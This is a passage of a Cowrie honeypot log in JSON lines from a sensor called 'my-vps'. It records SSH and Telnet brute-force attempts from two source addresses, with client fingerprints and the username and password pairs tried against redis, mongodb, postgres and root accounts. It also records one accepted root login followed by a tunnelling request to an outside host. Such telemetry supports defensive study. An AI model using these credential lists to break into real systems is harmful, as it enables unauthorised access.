hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:21:53.828897Z","src_ip":"212.227.125.160","session":"d241ba47617e"}
{"eventid":"cowrie.login.failed","username":"redis","password":"1234567","message":"login attempt [redis/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:21:54.471103Z","src_ip":"212.227.125.160","session":"d241ba47617e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:21:55.633358Z","src_ip":"212.227.125.160","session":"d241ba47617e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54032,"dst_ip":"1.2.3.4","dst_port":22,"session":"30f151df8d13","protocol":"ssh","message":"New connection: 212.227.125.160:54032 (1.2.3.4:22) [session: 30f151df8d13]","sensor":"my-vps","timestamp":"2025-08-28T13:22:28.292995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:22:28.294559Z","src_ip":"212.227.125.160","session":"30f151df8d13"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:22:28.465617Z","src_ip":"212.227.125.160","session":"30f151df8d13"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:22:28.982653Z","src_ip":"212.227.125.160","session":"30f151df8d13"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:22:30.156641Z","src_ip":"212.227.125.160","session":"30f151df8d13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53572,"dst_ip":"1.2.3.4","dst_port":22,"session":"97fa527d14ca","protocol":"ssh","message":"New connection: 212.227.125.160:53572 (1.2.3.4:22) [session: 97fa527d14ca]","sensor":"my-vps","timestamp":"2025-08-28T13:23:04.035441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:23:04.036444Z","src_ip":"212.227.125.160","session":"97fa527d14ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:23:04.209217Z","src_ip":"212.227.125.160","session":"97fa527d14ca"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"password","message":"login attempt [mongodb/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:23:04.921203Z","src_ip":"212.227.125.160","session":"97fa527d14ca"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:23:06.093483Z","src_ip":"212.227.125.160","session":"97fa527d14ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53048,"dst_ip":"1.2.3.4","dst_port":22,"session":"74920803da38","protocol":"ssh","message":"New connection: 212.227.125.160:53048 (1.2.3.4:22) [session: 74920803da38]","sensor":"my-vps","timestamp":"2025-08-28T13:23:40.039436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:23:40.043078Z","src_ip":"212.227.125.160","session":"74920803da38"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:23:40.209001Z","src_ip":"212.227.125.160","session":"74920803da38"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456789","message":"login attempt [mongodb/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:23:41.220084Z","src_ip":"212.227.125.160","session":"74920803da38"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:23:42.389944Z","src_ip":"212.227.125.160","session":"74920803da38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40390,"dst_ip":"1.2.3.4","dst_port":22,"session":"315cea802dcf","protocol":"ssh","message":"New connection: 212.227.125.160:40390 (1.2.3.4:22) [session: 315cea802dcf]","sensor":"my-vps","timestamp":"2025-08-28T13:23:53.965884Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:23:53.967150Z","src_ip":"212.227.125.160","session":"315cea802dcf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40661,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f932a3e670a","protocol":"ssh","message":"New connection: 212.227.125.160:40661 (1.2.3.4:22) [session: 2f932a3e670a]","sensor":"my-vps","timestamp":"2025-08-28T13:23:54.078203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:23:54.079567Z","src_ip":"212.227.125.160","session":"2f932a3e670a"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T13:23:54.192569Z","src_ip":"212.227.125.160","session":"2f932a3e670a"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:23:54.532516Z","src_ip":"212.227.125.160","session":"2f932a3e670a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T13:23:54.646117Z","session":"2f932a3e670a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53424,"dst_ip":"1.2.3.4","dst_port":22,"session":"14d5e468d1db","protocol":"ssh","message":"New connection: 212.227.125.160:53424 (1.2.3.4:22) [session: 14d5e468d1db]","sensor":"my-vps","timestamp":"2025-08-28T13:24:16.159861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:24:16.160686Z","src_ip":"212.227.125.160","session":"14d5e468d1db"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:24:16.322599Z","src_ip":"212.227.125.160","session":"14d5e468d1db"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"12345","message":"login attempt [mongodb/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:24:16.970034Z","src_ip":"212.227.125.160","session":"14d5e468d1db"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:24:18.134919Z","src_ip":"212.227.125.160","session":"14d5e468d1db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41395,"dst_ip":"1.2.3.4","dst_port":23,"session":"d1f9bb834007","protocol":"telnet","message":"New connection: 212.227.125.160:41395 (1.2.3.4:23) [session: d1f9bb834007]","sensor":"my-vps","timestamp":"2025-08-28T13:24:19.615944Z"}
{"eventid":"cowrie.session.closed","duration":0.0078084468841552734,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:24:19.623684Z","src_ip":"212.227.125.160","session":"d1f9bb834007"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43445,"dst_ip":"1.2.3.4","dst_port":23,"session":"99aeba39b065","protocol":"telnet","message":"New connection: 212.227.235.229:43445 (1.2.3.4:23) [session: 99aeba39b065]","sensor":"my-vps","timestamp":"2025-08-28T13:24:24.225429Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42557,"dst_ip":"1.2.3.4","dst_port":23,"session":"03c9d48ab165","protocol":"telnet","message":"New connection: 212.227.125.160:42557 (1.2.3.4:23) [session: 03c9d48ab165]","sensor":"my-vps","timestamp":"2025-08-28T13:24:37.794816Z"}
{"eventid":"cowrie.session.closed","duration":14.216798543930054,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:24:38.442157Z","src_ip":"212.227.235.229","session":"99aeba39b065"}
{"eventid":"cowrie.session.closed","duration":12.889528751373291,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:24:50.684236Z","src_ip":"212.227.125.160","session":"03c9d48ab165"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53318,"dst_ip":"1.2.3.4","dst_port":22,"session":"911bf1a21bca","protocol":"ssh","message":"New connection: 212.227.125.160:53318 (1.2.3.4:22) [session: 911bf1a21bca]","sensor":"my-vps","timestamp":"2025-08-28T13:24:52.575738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:24:52.576419Z","src_ip":"212.227.125.160","session":"911bf1a21bca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:24:52.744582Z","src_ip":"212.227.125.160","session":"911bf1a21bca"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"12345678","message":"login attempt [mongodb/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:24:53.417751Z","src_ip":"212.227.125.160","session":"911bf1a21bca"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:24:54.588708Z","src_ip":"212.227.125.160","session":"911bf1a21bca"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:25:04.078935Z","src_ip":"212.227.125.160","session":"2f932a3e670a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55414,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c96178a2b20","protocol":"ssh","message":"New connection: 212.227.125.160:55414 (1.2.3.4:22) [session: 6c96178a2b20]","sensor":"my-vps","timestamp":"2025-08-28T13:25:31.135932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:25:31.646751Z","src_ip":"212.227.125.160","session":"6c96178a2b20"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:25:31.647431Z","src_ip":"212.227.125.160","session":"6c96178a2b20"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"qwerty","message":"login attempt [mongodb/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:25:32.909783Z","src_ip":"212.227.125.160","session":"6c96178a2b20"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:25:34.080066Z","src_ip":"212.227.125.160","session":"6c96178a2b20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35944,"dst_ip":"1.2.3.4","dst_port":22,"session":"27760087250f","protocol":"ssh","message":"New connection: 212.227.235.229:35944 (1.2.3.4:22) [session: 27760087250f]","sensor":"my-vps","timestamp":"2025-08-28T13:25:36.145946Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:25:36.325338Z","src_ip":"212.227.235.229","session":"27760087250f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35958,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb5fcd9a3d43","protocol":"ssh","message":"New connection: 212.227.235.229:35958 (1.2.3.4:22) [session: bb5fcd9a3d43]","sensor":"my-vps","timestamp":"2025-08-28T13:25:36.503125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:25:36.504016Z","src_ip":"212.227.235.229","session":"bb5fcd9a3d43"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:25:36.682179Z","src_ip":"212.227.235.229","session":"bb5fcd9a3d43"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"q1w2e3r4","message":"login attempt [postgres/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-28T13:25:38.536910Z","src_ip":"212.227.235.229","session":"bb5fcd9a3d43"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:25:39.716412Z","src_ip":"212.227.235.229","session":"bb5fcd9a3d43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61855,"dst_ip":"1.2.3.4","dst_port":22,"session":"731b54b03dcd","protocol":"ssh","message":"New connection: 212.227.125.160:61855 (1.2.3.4:22) [session: 731b54b03dcd]","sensor":"my-vps","timestamp":"2025-08-28T13:25:43.387651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:25:43.388352Z","src_ip":"212.227.125.160","session":"731b54b03dcd"}
